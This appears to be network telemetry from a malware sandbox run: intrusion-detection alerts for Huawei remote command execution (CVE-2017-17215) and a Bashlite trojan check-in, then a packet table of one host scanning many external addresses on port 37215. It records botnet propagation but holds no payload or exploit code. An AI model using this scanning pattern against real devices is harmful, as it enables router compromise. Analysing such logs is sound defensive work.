                                            06/14/24-10:44:26.999411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4969237215192.168.2.14156.60.104.253
                                            06/14/24-10:44:14.667010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956037215192.168.2.14156.22.112.153
                                            06/14/24-10:44:24.933539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492437215192.168.2.1441.72.243.242
                                            06/14/24-10:43:50.111623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790037215192.168.2.14197.25.242.173
                                            06/14/24-10:43:43.967396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4986437215192.168.2.1441.82.202.58
                                            06/14/24-10:44:31.051871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5597837215192.168.2.14156.233.18.214
                                            06/14/24-10:43:43.969580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5766837215192.168.2.14197.162.83.24
                                            06/14/24-10:44:22.858707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6092237215192.168.2.14197.7.105.48
                                            06/14/24-10:44:26.977925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806837215192.168.2.1441.67.32.211
                                            06/14/24-10:44:00.340849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869637215192.168.2.14197.175.62.24
                                            06/14/24-10:43:48.031658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851837215192.168.2.1441.40.114.191
                                            06/14/24-10:44:00.324507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760837215192.168.2.1441.208.65.75
                                            06/14/24-10:44:18.776365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931237215192.168.2.14197.117.210.103
                                            06/14/24-10:44:22.881825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183837215192.168.2.14197.27.72.25
                                            06/14/24-10:44:26.978987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412837215192.168.2.1441.47.229.251
                                            06/14/24-10:43:34.663711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5386037215192.168.2.1441.117.177.184
                                            06/14/24-10:44:10.564443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356837215192.168.2.14156.12.229.127
                                            06/14/24-10:44:02.367824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296437215192.168.2.1441.144.20.141
                                            06/14/24-10:44:26.978431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4040837215192.168.2.14156.163.210.244
                                            06/14/24-10:44:04.420753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062037215192.168.2.1441.176.225.145
                                            06/14/24-10:44:02.367363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746237215192.168.2.14156.178.185.161
                                            06/14/24-10:43:39.792382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5126037215192.168.2.14197.111.80.225
                                            06/14/24-10:43:48.032025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140237215192.168.2.1441.47.114.162
                                            06/14/24-10:43:52.163143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974437215192.168.2.14197.143.127.189
                                            06/14/24-10:44:20.805844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569837215192.168.2.14197.98.120.102
                                            06/14/24-10:44:35.180407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613637215192.168.2.14156.105.84.191
                                            06/14/24-10:43:50.073426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599237215192.168.2.14156.249.54.93
                                            06/14/24-10:44:31.084133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4451837215192.168.2.14156.225.100.160
                                            06/14/24-10:43:56.231018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4086637215192.168.2.14156.19.87.158
                                            06/14/24-10:44:10.566239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863037215192.168.2.14197.119.225.223
                                            06/14/24-10:43:36.702985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5375437215192.168.2.1441.233.143.12
                                            06/14/24-10:44:24.915779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913237215192.168.2.14156.215.19.197
                                            06/14/24-10:44:08.502301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3276837215192.168.2.14156.136.219.76
                                            06/14/24-10:44:29.013027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5936837215192.168.2.14197.208.61.37
                                            06/14/24-10:43:58.277855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4949837215192.168.2.14197.152.125.124
                                            06/14/24-10:44:04.423754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025437215192.168.2.1441.112.35.176
                                            06/14/24-10:43:54.185354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550237215192.168.2.1441.164.91.172
                                            06/14/24-10:43:54.185459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587437215192.168.2.14197.73.150.12
                                            06/14/24-10:44:04.424886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824837215192.168.2.14197.4.170.127
                                            06/14/24-10:43:50.111878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356837215192.168.2.14156.124.69.50
                                            06/14/24-10:43:50.073031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4537437215192.168.2.14197.155.224.160
                                            06/14/24-10:43:50.111764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434237215192.168.2.14156.41.150.104
                                            06/14/24-10:44:35.177623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3640437215192.168.2.1441.95.38.245
                                            06/14/24-10:43:58.275596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5409837215192.168.2.14156.78.100.50
                                            06/14/24-10:43:58.289695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913237215192.168.2.14197.207.228.12
                                            06/14/24-10:44:33.133502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5230437215192.168.2.1441.178.244.171
                                            06/14/24-10:43:52.149437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4523837215192.168.2.14156.79.130.87
                                            06/14/24-10:44:10.545205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5494037215192.168.2.14197.204.194.130
                                            06/14/24-10:44:20.806339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313237215192.168.2.14197.20.92.132
                                            06/14/24-10:43:58.276474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627637215192.168.2.14156.191.9.228
                                            06/14/24-10:44:22.879851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779037215192.168.2.14156.179.68.241
                                            06/14/24-10:43:48.045461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866037215192.168.2.14156.0.144.189
                                            06/14/24-10:44:22.881108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4696637215192.168.2.14197.49.14.106
                                            06/14/24-10:44:22.857763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615037215192.168.2.14197.169.81.72
                                            06/14/24-10:44:00.336747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883237215192.168.2.14156.182.43.217
                                            06/14/24-10:44:12.647069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.14156.122.189.136
                                            06/14/24-10:44:06.472149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869237215192.168.2.14197.249.101.234
                                            06/14/24-10:43:41.849984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4076037215192.168.2.1441.130.196.14
                                            06/14/24-10:43:45.966394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536837215192.168.2.1441.88.141.154
                                            06/14/24-10:43:52.146557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5082637215192.168.2.1441.223.184.157
                                            06/14/24-10:44:04.421525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4806837215192.168.2.1441.151.20.100
                                            06/14/24-10:44:18.765993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4042037215192.168.2.14156.176.31.17
                                            06/14/24-10:44:24.917943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5391037215192.168.2.14197.94.236.117
                                            06/14/24-10:44:29.023164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5459037215192.168.2.14197.121.221.123
                                            06/14/24-10:43:56.243793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874837215192.168.2.14156.144.114.201
                                            06/14/24-10:44:20.804618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5307837215192.168.2.1441.71.209.7
                                            06/14/24-10:44:22.861534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5402237215192.168.2.14197.160.204.246
                                            06/14/24-10:43:45.988020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6010837215192.168.2.1441.254.173.105
                                            06/14/24-10:43:58.293129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448037215192.168.2.14156.53.235.221
                                            06/14/24-10:44:08.517693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3922237215192.168.2.14156.16.9.249
                                            06/14/24-10:44:26.977279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054037215192.168.2.1441.39.163.121
                                            06/14/24-10:44:33.151165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826637215192.168.2.14156.108.95.194
                                            06/14/24-10:43:41.902390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961837215192.168.2.1441.157.119.217
                                            06/14/24-10:44:26.985962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5643237215192.168.2.1441.101.7.31
                                            06/14/24-10:44:29.010392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313837215192.168.2.14197.178.131.163
                                            06/14/24-10:43:41.846849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3982837215192.168.2.1441.236.178.242
                                            06/14/24-10:44:35.180861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630637215192.168.2.1441.31.244.158
                                            06/14/24-10:44:14.689041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797237215192.168.2.14156.220.123.232
                                            06/14/24-10:44:04.411297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4747437215192.168.2.14156.26.58.245
                                            06/14/24-10:44:08.518560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650237215192.168.2.14197.47.45.97
                                            06/14/24-10:44:12.616781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5541437215192.168.2.14156.234.240.2
                                            06/14/24-10:43:43.967600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013837215192.168.2.14197.36.164.250
                                            06/14/24-10:44:02.367289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296837215192.168.2.1441.125.21.166
                                            06/14/24-10:43:58.273822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709037215192.168.2.14156.72.173.8
                                            06/14/24-10:44:12.645698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3809037215192.168.2.14197.250.132.188
                                            06/14/24-10:44:14.687300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4096037215192.168.2.1441.66.48.1
                                            06/14/24-10:44:06.451059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689037215192.168.2.14197.193.38.126
                                            06/14/24-10:44:12.643167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356637215192.168.2.14156.240.244.36
                                            06/14/24-10:44:18.779166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849437215192.168.2.1441.93.131.182
                                            06/14/24-10:43:37.772255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079237215192.168.2.14197.33.21.171
                                            06/14/24-10:43:58.276373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045837215192.168.2.1441.205.146.138
                                            06/14/24-10:44:08.505191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5493437215192.168.2.1441.14.7.71
                                            06/14/24-10:43:50.071753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4400237215192.168.2.14156.114.240.61
                                            06/14/24-10:43:48.046007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3825237215192.168.2.14156.186.227.11
                                            06/14/24-10:44:06.450602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3620037215192.168.2.1441.60.109.189
                                            06/14/24-10:44:22.861652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5816237215192.168.2.14156.235.162.6
                                            06/14/24-10:44:00.339630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973637215192.168.2.14156.141.239.197
                                            06/14/24-10:44:06.451879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369637215192.168.2.14156.145.186.66
                                            06/14/24-10:43:43.944090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984637215192.168.2.1441.126.169.85
                                            06/14/24-10:44:20.807048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317637215192.168.2.14197.232.14.220
                                            06/14/24-10:43:37.760034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487437215192.168.2.1441.215.187.172
                                            06/14/24-10:43:48.018820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3281237215192.168.2.1441.127.239.204
                                            06/14/24-10:44:14.689197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5414037215192.168.2.1441.135.240.102
                                            06/14/24-10:43:56.246272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990637215192.168.2.1441.97.217.229
                                            06/14/24-10:43:43.967847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428837215192.168.2.14156.143.145.2
                                            06/14/24-10:44:18.763851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5107237215192.168.2.14156.100.140.18
                                            06/14/24-10:44:14.683152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4929837215192.168.2.14156.13.210.240
                                            06/14/24-10:43:37.763500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4003837215192.168.2.14197.49.11.146
                                            06/14/24-10:44:31.053230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3467037215192.168.2.1441.192.191.239
                                            06/14/24-10:44:26.998672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155637215192.168.2.14156.16.175.170
                                            06/14/24-10:44:16.717183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376837215192.168.2.14197.254.58.10
                                            06/14/24-10:43:52.163226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814637215192.168.2.14156.137.173.211
                                            06/14/24-10:43:54.185416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6098437215192.168.2.14197.203.60.109
                                            06/14/24-10:43:34.662165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3562437215192.168.2.14156.159.166.61
                                            06/14/24-10:44:06.450387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4039237215192.168.2.14197.232.37.75
                                            06/14/24-10:44:24.916644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940437215192.168.2.14197.89.175.36
                                            06/14/24-10:44:22.858343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025037215192.168.2.14197.135.99.221
                                            06/14/24-10:44:08.504013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3281237215192.168.2.1441.17.173.4
                                            06/14/24-10:43:37.761629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105437215192.168.2.14197.23.170.100
                                            06/14/24-10:43:39.792668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4531637215192.168.2.1441.253.125.109
                                            06/14/24-10:44:35.179807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615237215192.168.2.14156.199.150.81
                                            06/14/24-10:44:35.179684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734837215192.168.2.14156.100.117.38
                                            06/14/24-10:44:10.546143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734237215192.168.2.1441.198.237.112
                                            06/14/24-10:43:54.203235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931637215192.168.2.1441.71.134.197
                                            06/14/24-10:43:43.971683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727437215192.168.2.14197.154.142.122
                                            06/14/24-10:43:58.289836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346237215192.168.2.14156.150.39.8
                                            06/14/24-10:44:27.001273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4696037215192.168.2.1441.251.133.26
                                            06/14/24-10:44:21.346542TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)4046823192.168.2.14101.23.0.0
                                            06/14/24-10:43:45.969593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5320437215192.168.2.14156.155.131.20
                                            06/14/24-10:44:35.177752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501837215192.168.2.14156.144.94.132
                                            06/14/24-10:43:36.705543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5299437215192.168.2.14156.85.17.57
                                            06/14/24-10:43:48.034500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4603637215192.168.2.1441.181.77.252
                                            06/14/24-10:44:35.183003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3895437215192.168.2.1441.108.243.179
                                            06/14/24-10:43:50.110656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593837215192.168.2.14156.80.207.11
                                            06/14/24-10:43:43.970681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932037215192.168.2.14197.248.128.206
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jun 14, 2024 10:43:33.650751114 CEST661137215192.168.2.14156.47.96.254
                                            Jun 14, 2024 10:43:33.650759935 CEST661137215192.168.2.1441.60.152.249
                                            Jun 14, 2024 10:43:33.650770903 CEST661137215192.168.2.1441.245.235.255
                                            Jun 14, 2024 10:43:33.650770903 CEST661137215192.168.2.1441.131.181.63
                                            Jun 14, 2024 10:43:33.650772095 CEST661137215192.168.2.1441.78.102.254
                                            Jun 14, 2024 10:43:33.650778055 CEST661137215192.168.2.14156.224.103.158
                                            Jun 14, 2024 10:43:33.650782108 CEST661137215192.168.2.1441.211.225.173
                                            Jun 14, 2024 10:43:33.650784016 CEST661137215192.168.2.14197.207.188.68
                                            Jun 14, 2024 10:43:33.650794983 CEST661137215192.168.2.1441.187.63.243
                                            Jun 14, 2024 10:43:33.650794983 CEST661137215192.168.2.1441.96.243.63
                                            Jun 14, 2024 10:43:33.650800943 CEST661137215192.168.2.14197.156.162.157
                                            Jun 14, 2024 10:43:33.650800943 CEST661137215192.168.2.1441.203.38.182
                                            Jun 14, 2024 10:43:33.650809050 CEST661137215192.168.2.14197.30.81.14
                                            Jun 14, 2024 10:43:33.650810003 CEST661137215192.168.2.14197.145.0.42
                                            Jun 14, 2024 10:43:33.650809050 CEST661137215192.168.2.14156.67.95.193
                                            Jun 14, 2024 10:43:33.650816917 CEST661137215192.168.2.1441.182.182.25
                                            Jun 14, 2024 10:43:33.650819063 CEST661137215192.168.2.14197.115.91.80
                                            Jun 14, 2024 10:43:33.650825977 CEST661137215192.168.2.14156.149.180.35
                                            Jun 14, 2024 10:43:33.650826931 CEST661137215192.168.2.1441.85.57.174
                                            Jun 14, 2024 10:43:33.650850058 CEST661137215192.168.2.1441.229.152.150
                                            Jun 14, 2024 10:43:33.650850058 CEST661137215192.168.2.1441.146.247.111
                                            Jun 14, 2024 10:43:33.650870085 CEST661137215192.168.2.1441.20.102.108
                                            Jun 14, 2024 10:43:33.650872946 CEST661137215192.168.2.14156.81.56.92
                                            Jun 14, 2024 10:43:33.650873899 CEST661137215192.168.2.14197.92.82.210
                                            Jun 14, 2024 10:43:33.650878906 CEST661137215192.168.2.1441.68.188.191
                                            Jun 14, 2024 10:43:33.650882959 CEST661137215192.168.2.14156.97.90.225
                                            Jun 14, 2024 10:43:33.650887012 CEST661137215192.168.2.1441.172.240.153
                                            Jun 14, 2024 10:43:33.650888920 CEST661137215192.168.2.1441.174.190.39
                                            Jun 14, 2024 10:43:33.650895119 CEST661137215192.168.2.1441.38.84.36
                                            Jun 14, 2024 10:43:33.650898933 CEST661137215192.168.2.14197.82.207.29
                                            Jun 14, 2024 10:43:33.650904894 CEST661137215192.168.2.14156.188.227.67
                                            Jun 14, 2024 10:43:33.650913954 CEST661137215192.168.2.14197.12.163.24
                                            Jun 14, 2024 10:43:33.650924921 CEST661137215192.168.2.1441.216.220.242
                                            Jun 14, 2024 10:43:33.650928020 CEST661137215192.168.2.1441.198.161.145
                                            Jun 14, 2024 10:43:33.650928020 CEST661137215192.168.2.1441.17.142.44
                                            Jun 14, 2024 10:43:33.650932074 CEST661137215192.168.2.14156.36.89.39
                                            Jun 14, 2024 10:43:33.650932074 CEST661137215192.168.2.1441.145.71.139
                                            Jun 14, 2024 10:43:33.650934935 CEST661137215192.168.2.1441.156.92.120
                                            Jun 14, 2024 10:43:33.650952101 CEST661137215192.168.2.1441.161.125.211
                                            Jun 14, 2024 10:43:33.650953054 CEST661137215192.168.2.1441.83.153.150
                                            Jun 14, 2024 10:43:33.650957108 CEST661137215192.168.2.14197.45.165.234
                                            Jun 14, 2024 10:43:33.650965929 CEST661137215192.168.2.14197.224.78.64
                                            Jun 14, 2024 10:43:33.650989056 CEST661137215192.168.2.14156.44.219.206
                                            Jun 14, 2024 10:43:33.650989056 CEST661137215192.168.2.14156.70.90.47
                                            Jun 14, 2024 10:43:33.650990009 CEST661137215192.168.2.1441.21.0.89
                                            Jun 14, 2024 10:43:33.650991917 CEST661137215192.168.2.1441.17.37.241
                                            Jun 14, 2024 10:43:33.650995016 CEST661137215192.168.2.14197.172.100.117
                                            Jun 14, 2024 10:43:33.651005030 CEST661137215192.168.2.14197.143.65.56
                                            Jun 14, 2024 10:43:33.651006937 CEST661137215192.168.2.1441.103.250.3
                                            Jun 14, 2024 10:43:33.651005983 CEST661137215192.168.2.14197.33.230.71
                                            Jun 14, 2024 10:43:33.651009083 CEST661137215192.168.2.14156.92.179.212
                                            Jun 14, 2024 10:43:33.651012897 CEST661137215192.168.2.14156.75.157.213
                                            Jun 14, 2024 10:43:33.651016951 CEST661137215192.168.2.14156.54.177.90
                                            Jun 14, 2024 10:43:33.651017904 CEST661137215192.168.2.14156.129.96.206
                                            Jun 14, 2024 10:43:33.651020050 CEST661137215192.168.2.14197.1.228.185
                                            Jun 14, 2024 10:43:33.651021004 CEST661137215192.168.2.1441.48.170.201
                                            Jun 14, 2024 10:43:33.651034117 CEST661137215192.168.2.1441.153.119.111
                                            Jun 14, 2024 10:43:33.651038885 CEST661137215192.168.2.14156.159.166.61
                                            Jun 14, 2024 10:43:33.651040077 CEST661137215192.168.2.1441.229.62.31
                                            Jun 14, 2024 10:43:33.651041985 CEST661137215192.168.2.1441.181.77.39
                                            Jun 14, 2024 10:43:33.651048899 CEST661137215192.168.2.14197.165.171.189
                                            Jun 14, 2024 10:43:33.651067019 CEST661137215192.168.2.14156.131.196.119
                                            Jun 14, 2024 10:43:33.651067972 CEST661137215192.168.2.1441.211.139.167
                                            Jun 14, 2024 10:43:33.651067019 CEST661137215192.168.2.1441.65.197.2
                                            Jun 14, 2024 10:43:33.651071072 CEST661137215192.168.2.1441.162.173.241
                                            Jun 14, 2024 10:43:33.651081085 CEST661137215192.168.2.14156.124.39.243
                                            Jun 14, 2024 10:43:33.651092052 CEST661137215192.168.2.1441.31.120.95
                                            Jun 14, 2024 10:43:33.651094913 CEST661137215192.168.2.14197.244.221.110
                                            Jun 14, 2024 10:43:33.651094913 CEST661137215192.168.2.1441.68.4.247
                                            Jun 14, 2024 10:43:33.651096106 CEST661137215192.168.2.14156.231.88.25
                                            Jun 14, 2024 10:43:33.651096106 CEST661137215192.168.2.1441.83.251.197
                                            Jun 14, 2024 10:43:33.651096106 CEST661137215192.168.2.1441.150.152.40
                                            Jun 14, 2024 10:43:33.651104927 CEST661137215192.168.2.14156.173.40.172
                                            Jun 14, 2024 10:43:33.651104927 CEST661137215192.168.2.1441.73.147.202
                                            Jun 14, 2024 10:43:33.651108027 CEST661137215192.168.2.1441.137.12.98
                                            Jun 14, 2024 10:43:33.651108027 CEST661137215192.168.2.14156.251.163.18
                                            Jun 14, 2024 10:43:33.651108027 CEST661137215192.168.2.14156.72.192.166
                                            Jun 14, 2024 10:43:33.651112080 CEST661137215192.168.2.14197.106.253.26
                                            Jun 14, 2024 10:43:33.651125908 CEST661137215192.168.2.14197.208.58.206
                                            Jun 14, 2024 10:43:33.651125908 CEST661137215192.168.2.1441.76.10.213
                                            Jun 14, 2024 10:43:33.651129961 CEST661137215192.168.2.14156.59.39.131
                                            Jun 14, 2024 10:43:33.651130915 CEST661137215192.168.2.1441.162.130.70
                                            Jun 14, 2024 10:43:33.651139975 CEST661137215192.168.2.1441.172.243.251
                                            Jun 14, 2024 10:43:33.651140928 CEST661137215192.168.2.14197.160.6.126
                                            Jun 14, 2024 10:43:33.651158094 CEST661137215192.168.2.14156.184.162.68
                                            Jun 14, 2024 10:43:33.651158094 CEST661137215192.168.2.1441.49.177.241
                                            Jun 14, 2024 10:43:33.651163101 CEST661137215192.168.2.14197.96.60.42
                                            Jun 14, 2024 10:43:33.651163101 CEST661137215192.168.2.14156.83.228.55
                                            Jun 14, 2024 10:43:33.651165962 CEST661137215192.168.2.1441.86.97.148
                                            Jun 14, 2024 10:43:33.651175976 CEST661137215192.168.2.14156.45.119.80
                                            Jun 14, 2024 10:43:33.651182890 CEST661137215192.168.2.14156.17.229.84
                                            Jun 14, 2024 10:43:33.651194096 CEST661137215192.168.2.1441.135.86.170
                                            Jun 14, 2024 10:43:33.651196003 CEST661137215192.168.2.14156.99.70.130
                                            Jun 14, 2024 10:43:33.651196957 CEST661137215192.168.2.14197.147.108.144
                                            Jun 14, 2024 10:43:33.651199102 CEST661137215192.168.2.1441.219.214.89
